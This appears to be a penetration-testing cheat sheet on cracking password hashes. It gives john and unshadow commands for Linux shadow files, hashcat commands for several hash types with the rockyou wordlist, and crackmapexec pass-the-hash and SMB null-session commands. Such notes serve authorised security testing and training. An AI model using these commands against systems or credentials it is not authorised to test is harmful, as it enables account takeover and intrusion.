Crack the hash
hashcat john ophcrack// can also use rainbow tables (cpu) RainbowCrack //used rainbow tables and (gpu)
john
Shadow file: $ unshadow passwd shadow > unshadow.db $ john unshadow.db
ophcrack
can also use rainbow tables (cpu)
Rainbowcrack
//used rainbow tables and (gpu)
Hashcat
Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
#Hashcat MD5 $1$ shadow file hashcat -m 500 -a 0 hash.txt rockyou.txt --username
Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt
Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt --force
Hashcat Wordpress
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
Crackmapexec
//Pass the hash #crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH #crackmapexec smb <target(s)> -u username -H NTHASH
//NULL Sessions #crackmapexec smb <target(s)> -u '' -p ''
Last updated
Was this helpful?